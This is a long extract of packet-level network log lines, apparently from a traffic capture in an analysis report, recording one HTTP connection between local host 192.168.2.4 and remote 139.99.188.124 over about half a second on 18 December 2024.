                                                                              Dec 18, 2024 21:00:36.770170927 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.873097897 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.879831076 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.882836103 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.882872105 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.882906914 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.882941008 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.882966995 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.883052111 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.883086920 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.883131027 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.885195971 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.885231972 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.885540009 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.886683941 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.886717081 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.886773109 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.888405085 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.888439894 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.888556004 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.889776945 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.889959097 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.890005112 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.891773939 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.891808987 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.891856909 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.893420935 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.893455982 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.893503904 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.895221949 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.895354033 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.895494938 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.895740986 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.895776033 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.895808935 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.895833015 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.896083117 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.896119118 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.896172047 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.897841930 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.897876978 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.897896051 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.899637938 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.899673939 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.899688005 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.901468039 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.901504040 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.901536942 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.901554108 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.901578903 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.903398991 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.903434038 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.903506994 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.905056953 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.905092001 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.905148029 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.906877995 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.906914949 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.907140017 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.908493042 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.908528090 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.908581018 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.910336018 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.910371065 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.910403967 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.910418987 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.912058115 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.912091970 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.912103891 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.913870096 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.913903952 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.913918018 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.915652990 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.915687084 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.915705919 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.917404890 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.917449951 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.917458057 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.917490959 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.917536974 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.919186115 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.919222116 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.919276953 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.920981884 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.921015978 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.921065092 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.922852993 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.922945023 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.922986031 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.924570084 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.924606085 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.924654007 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.926462889 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.926497936 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.926531076 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.926542044 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.928139925 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.928174973 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.928226948 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.929979086 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.930016041 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.930028915 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.931632996 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.931682110 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.931685925 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.933799028 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.933834076 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.933849096 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.933867931 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.933912039 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.935246944 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.935286999 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.935400009 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.937256098 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.937290907 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.937330008 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.938997984 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.939033031 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.939080954 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.940527916 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.940613031 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.940658092 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.942439079 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.942472935 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.942507029 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.942569971 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.944212914 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.944247007 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.944302082 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.945938110 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.945972919 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.946028948 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.947869062 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.947904110 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.947961092 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.949500084 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.949534893 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.949549913 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.949568033 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.949624062 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.951284885 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.951335907 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.951534033 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.953160048 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.953193903 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.953241110 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.954986095 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.955019951 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.955065966 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.956703901 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.956739902 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.956775904 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.958518982 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.958553076 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.958585978 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.958591938 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.960237026 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.960273027 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.960285902 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.962330103 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.962393999 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.962404966 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.070342064 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.070419073 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.070424080 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.071301937 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.071331978 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.071348906 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.073115110 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.073148966 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.073168993 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.074537992 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.074568033 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.074582100 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.076116085 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.076148987 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.076211929 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.078000069 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.078046083 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.078088045 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.079231977 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.079281092 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.079332113 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.082570076 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.082617998 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.082870007 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.086656094 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.086690903 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.086720943 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.087769032 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.087802887 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.087817907 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.089427948 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.089462996 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.089466095 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.089510918 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.089572906 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.090018034 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.090065956 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.090158939 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.090615034 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.090662956 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.090727091 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.091942072 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.091975927 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.092022896 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.093579054 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.093614101 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.093646049 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.093714952 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.095561028 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.095596075 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.095606089 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.097310066 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.097345114 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.097361088 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.099009037 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.099044085 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.099055052 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.100689888 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.100724936 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.100739002 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.102684021 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.102719069 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.102751017 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.103112936 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.104247093 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.104283094 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.104973078 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.106291056 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.106326103 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.106378078 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.107938051 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.107973099 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.108170986 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.109564066 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.109600067 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.109632015 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.109664917 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.111306906 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.111380100 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.111382008 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.113105059 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.113140106 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.113158941 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.114907026 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.114943027 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.114953041 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.116754055 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.116789103 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.116816998 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.118515015 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.118550062 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.118562937 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.118582964 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.118626118 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.120244026 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.120279074 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.120320082 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.122104883 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.122140884 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.122183084 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.123856068 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.123892069 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.123951912 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.125600100 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.125636101 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.125669003 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.125961065 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.127574921 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.127610922 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.127638102 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.129187107 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.129237890 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.129255056 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.130951881 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.130989075 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.131016970 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.132821083 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.132857084 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.132985115 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.134579897 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.134613991 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.134645939 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.134694099 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.134694099 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.136316061 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.136349916 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.136617899 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.138156891 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.138190985 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.138508081 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.139858007 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.139892101 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.140039921 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.141640902 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.141674042 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.141705990 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.141762972 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.143455029 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.143491983 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.143526077 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.145232916 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.145267963 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.145343065 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.147594929 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.147763968 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.151875019 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.152611017 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.152646065 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.152734995 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.153548956 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.153584003 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.153599977 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.153618097 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.153701067 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.155373096 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.155553102 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.155688047 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.155930042 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.155965090 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.156023979 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.262264967 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.262501955 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.262617111 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.262741089 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.263593912 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.263956070 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.264317036 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.264334917 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.264377117 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.265918970 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.265937090 CET8049753139.99.188.124192.168.2.4
